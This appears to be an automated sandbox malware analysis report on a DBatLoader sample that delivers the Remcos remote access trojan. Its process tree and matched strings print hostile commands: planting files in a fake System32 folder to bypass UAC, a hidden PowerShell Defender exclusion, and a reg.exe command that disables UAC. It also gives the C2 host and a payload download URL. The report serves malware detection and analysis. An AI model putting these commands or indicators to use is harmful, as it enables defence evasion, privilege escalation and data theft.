Windows Analysis Report
tTIYCp2sf4.exe

Overview

General Information

Sample Name: tTIYCp2sf4.exe
Original Sample Name: cf39a14a2dc1fe5aa487b6faf19c63bc97103db670fa24c62832895e3002eca2.exe
Analysis ID: 1285850
MD5: ae5ad2efd8a9cf25ad9eb00ebe24eb92
SHA1: 2eee8f21d06a2602ed0cd3e5dc3a8a0dea8157d1
SHA256: cf39a14a2dc1fe5aa487b6faf19c63bc97103db670fa24c62832895e3002eca2
Tags: exe, ModiLoader

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Sigma detected: Remcos
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Found malware configuration
Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Yara detected DBatLoader
Multi AV Scanner detection for dropped file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
DLL side loading technique detected
Adds a directory exclusion to Windows Defender
Drops executables to the windows directory (C:\Windows) and starts them
Sample uses process hollowing technique
Installs a global keyboard hook
Drops PE files with a suspicious file extension
Writes to foreign memory regions
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
PE file contains more sections than normal
Yara detected Keylogger Generic
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Contains functionality to call native functions
IP address seen in connection with other malware
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports

Classification

  • System is w10x64
  • tTIYCp2sf4.exe (PID: 7068 cmdline: C:\Users\user\Desktop\tTIYCp2sf4.exe MD5: AE5AD2EFD8A9CF25AD9EB00EBE24EB92)
    • cmd.exe (PID: 6332 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\GjwyghlfO.bat" " MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6304 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO F" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • xcopy.exe (PID: 3616 cmdline: xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y MD5: 9F3712DDC0D7FE3D75B8A06C6EE8E68C)
      • cmd.exe (PID: 3112 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO F" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • xcopy.exe (PID: 6468 cmdline: xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y MD5: 9F3712DDC0D7FE3D75B8A06C6EE8E68C)
      • cmd.exe (PID: 6620 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO F" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • xcopy.exe (PID: 6616 cmdline: xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y MD5: 9F3712DDC0D7FE3D75B8A06C6EE8E68C)
      • easinvoker.exe (PID: 6552 cmdline: C:\Windows \System32\easinvoker.exe MD5: 231CE1E1D7D98B44371FFFF407D68B59)
        • cmd.exe (PID: 6576 cmdline: C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat"" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • powershell.exe (PID: 2404 cmdline: powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 95000560239032BC68B4C2FDFCDEF913)
            • conhost.exe (PID: 2164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 1332 cmdline: ping 127.0.0.1 -n 6 MD5: 70C24A306F768936563ABDADB9CA9108)
    • flhgywjG.bat (PID: 4028 cmdline: C:\Users\Public\Libraries\flhgywjG.bat MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Gjwyghlf.PIF (PID: 6936 cmdline: "C:\Users\Public\Libraries\Gjwyghlf.PIF" MD5: AE5AD2EFD8A9CF25AD9EB00EBE24EB92)
    • flhgywjG.bat (PID: 6572 cmdline: C:\Users\Public\Libraries\flhgywjG.bat MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Gjwyghlf.PIF (PID: 4396 cmdline: "C:\Users\Public\Libraries\Gjwyghlf.PIF" MD5: AE5AD2EFD8A9CF25AD9EB00EBE24EB92)
    • flhgywjG.bat (PID: 6888 cmdline: C:\Users\Public\Libraries\flhgywjG.bat MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Host:Port:Password": "www.binccoco.com:2404:0", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Mutex": "Rmc-5D7S76", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "gfdghfhjf"}
{"Download Url": "https://onedrive.live.com/download?resid=F253EE082321791B%21110&authkey=!AMAFiW2uLt6IzGM"}
Source | Rule | Description | Author | Strings
tTIYCp2sf4.exe | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\Public\Libraries\Gjwyghlf.PIF | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security

Source | Rule | Description | Author | Strings
00000016.00000002.586128217.0000000000647000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000014.00000002.571086194.0000000000557000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6b4a0:$a1: Remcos restarted by watchdog!
  • 0x6ba1c:$a3: %02i:%02i:%02i:%03i

Source | Rule | Description | Author | Strings
20.2.flhgywjG.bat.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
20.2.flhgywjG.bat.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
20.2.flhgywjG.bat.400000.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0x653d8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x6536c:$s1: CoGetObject
  • 0x65380:$s1: CoGetObject
  • 0x6539c:$s1: CoGetObject
  • 0x6f27e:$s1: CoGetObject
  • 0x6532c:$s2: Elevation:Administrator!new:
20.2.flhgywjG.bat.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6b490:$a1: Remcos restarted by watchdog!
  • 0x6ba0c:$a3: %02i:%02i:%02i:%03i
20.2.flhgywjG.bat.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x654e4:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65460:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65460:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65960:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66190:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65554:$str_b2: Executing file:
  • 0x665d4:$str_b3: GetDirectListeningPort
  • 0x65f80:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66100:$str_b7: \update.vbs
  • 0x6557c:$str_b9: Downloaded file:
  • 0x65568:$str_b10: Downloading file:
  • 0x6560c:$str_b12: Failed to upload file:
  • 0x6659c:$str_b13: StartForward
  • 0x665bc:$str_b14: StopForward
  • 0x66058:$str_b15: fso.DeleteFile "
  • 0x65fec:$str_b16: On Error Resume Next
  • 0x66088:$str_b17: fso.DeleteFolder "
  • 0x655fc:$str_b18: Uploaded file:
  • 0x655bc:$str_b19: Unable to delete:
  • 0x66020:$str_b20: while fso.FileExists("
  • 0x65a99:$str_c0: [Firefox StoredLogins not found]

                  Stealing of Sensitive Information

                  Source: Registry Key setAuthor: Joe Security: Data: Details: 3C 5E F5 F5 68 1B 7F D9 B5 21 6B E2 7D 73 DB F1 B7 1B 1F E7 7A C7 EF B7 CA 30 AD 6F 25 50 55 23 31 01 4C 97 89 6E D6 92 D6 39 C4 DF 31 EB A5 6C 58 ED 7A 9E 48 A5 7A 3D 9B 3D EB A0 64 64 D7 30 2B DD E6 8F F4 FE 29 C0 95 CF 7E 09 24 50 , EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\flhgywjG.bat, ProcessId: 4028, TargetObject: HKEY_CURRENT_USER\Software\Rmc-5D7S76\exepath
                  Timestamp: 08/04/23-18:16:13.628852
                  Source IP: 23.172.112.72
                  Destination IP: 192.168.2.4
                  SID: 2032777
                  Source Port: 2404
                  Destination Port: 49682
                  Protocol: TCP
                  Classtype: A Network Trojan was detected

                  Timestamp: 08/04/23-18:14:07.921866
                  Source IP: 192.168.2.4
                  Destination IP: 23.172.112.72
                  SID: 2032776
                  Source Port: 49682
                  Destination Port: 2404
                  Protocol: TCP
                  Classtype: A Network Trojan was detected

                  AV Detection

                  Source: C:\Windows \System32\netutils.dll, Avira: detection malicious, Label: TR/Starter.glbyt
                  Source: C:\Users\Public\Libraries\netutils.dll, Avira: detection malicious, Label: TR/Starter.glbyt
                  Source: tTIYCp2sf4.exe, Malware Configuration Extractor: DBatLoader {"Download Url": "https://onedrive.live.com/download?resid=F253EE082321791B%21110&authkey=!AMAFiW2uLt6IzGM"}
                  Source: 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "www.binccoco.com:2404:0", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Mutex": "Rmc-5D7S76", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "gfdghfhjf"}
                  Source: tTIYCp2sf4.exe, Virustotal: Detection: 47%
                  Source: tTIYCp2sf4.exe, ReversingLabs: Detection: 55%
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIF, ReversingLabs: Detection: 55%
                  Source: C:\Users\Public\Libraries\netutils.dll, ReversingLabs: Detection: 83%
                  Source: C:\Windows \System32\netutils.dll, ReversingLabs: Detection: 83%
                  Source: tTIYCp2sf4.exe, Joe Sandbox ML: detected
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIF, Joe Sandbox ML: detected
                  Source: tTIYCp2sf4.exe, 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----

                  Exploits


                  Compliance

                  Source: C:\Users\Public\Libraries\flhgywjG.bat, Unpacked PE file: 17.2.flhgywjG.bat.400000.0.unpack
                  Source: C:\Users\Public\Libraries\flhgywjG.bat, Unpacked PE file: 20.2.flhgywjG.bat.400000.0.unpack
                  Source: C:\Users\Public\Libraries\flhgywjG.bat, Unpacked PE file: 22.2.flhgywjG.bat.400000.0.unpack
                  Source: tTIYCp2sf4.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: Binary string: easinvoker.pdb source: tTIYCp2sf4.exe, 00000000.00000002.558279383.000000007F300000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000003.537518251.000000007EE70000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.554984890.00000000028C4000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000002.542660336.000000000060C000.00000004.00000020.00020000.00000000.sdmp, easinvoker.exe, easinvoker.exe, 0000000B.00000002.546849860.00007FF780541000.00000020.00000001.01000000.00000006.sdmp, easinvoker.exe.5.dr, easinvoker.exe.0.dr
                  Source: Binary string: easinvoker.pdbH source: tTIYCp2sf4.exe, 00000000.00000002.558279383.000000007F300000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000003.540595825.0000000003971000.00000004.00000020.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000003.537518251.000000007EE70000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.554984890.00000000028C4000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000002.542660336.000000000060C000.00000004.00000020.00020000.00000000.sdmp, easinvoker.exe, 0000000B.00000002.546849860.00007FF780541000.00000020.00000001.01000000.00000006.sdmp, easinvoker.exe.5.dr, easinvoker.exe.0.dr
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exe, Code function: 0_2_028558CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA

                  Networking

                  Source: Traffic, Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49682 -> 23.172.112.72:2404
                  Source: Traffic, Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 23.172.112.72:2404 -> 192.168.2.4:49682
                  Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6
                  Source: Malware configuration extractor, URLs: www.binccoco.com
                  Source: Malware configuration extractor, URLs: https://onedrive.live.com/download?resid=F253EE082321791B%21110&authkey=!AMAFiW2uLt6IzGM
                  Source: global traffic, HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
                  Source: Joe Sandbox View, IP Address: 178.237.33.50
                  Source: global traffic, TCP traffic: 192.168.2.4:49682 -> 23.172.112.72:2404
                  Source: unknown, DNS traffic detected: queries for: onedrive.live.com

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Users\Public\Libraries\flhgywjG.bat, Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\flhgywjG.bat
                  Source: Yara matchFile source: Process Memory Space: tTIYCp2sf4.exe PID: 7068, type: MEMORYSTR
                  Source: tTIYCp2sf4.exe, 00000000.00000002.553677436.000000000067A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  E-Banking Fraud

                  Source: Yara matchFile source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000016.00000002.586128217.0000000000647000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.571086194.0000000000557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: tTIYCp2sf4.exe PID: 7068, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: flhgywjG.bat PID: 4028, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: flhgywjG.bat PID: 6572, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: flhgywjG.bat PID: 6888, type: MEMORYSTR

                  System Summary

                  Source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: Process Memory Space: tTIYCp2sf4.exe PID: 7068, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: flhgywjG.bat PID: 4028, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: flhgywjG.bat PID: 6572, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: flhgywjG.bat PID: 6888, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_0287B30F0_2_0287B30F
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_028520C40_2_028520C4
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_0288506C0_2_0288506C
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02881D2A0_2_02881D2A
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_02897D7C0_2_02897D7C
                  Source: C:\Windows \System32\easinvoker.exeCode function: 11_2_00007FF78054B98211_2_00007FF78054B982
                  Source: C:\Windows \System32\easinvoker.exeCode function: 11_2_00007FF78054455411_2_00007FF780544554
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_0286C194 CreateProcessAsUserW,NtCreateProcess,WaitForSingleObject,CloseHandle,CloseHandle,0_2_0286C194
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeSection loaded: ?????.dll
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeSection loaded: si.dll
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeSection loaded: endpointdlp.dll
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFSection loaded: ?????.dll
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFSection loaded: si.dll
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFSection loaded: endpointdlp.dll
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFSection loaded: advapi.dll
                  Source: netutils.dll.0.drStatic PE information: Number of sections : 19 > 10
                  Source: netutils.dll.8.drStatic PE information: Number of sections : 19 > 10
                  Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                  Source: tTIYCp2sf4.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
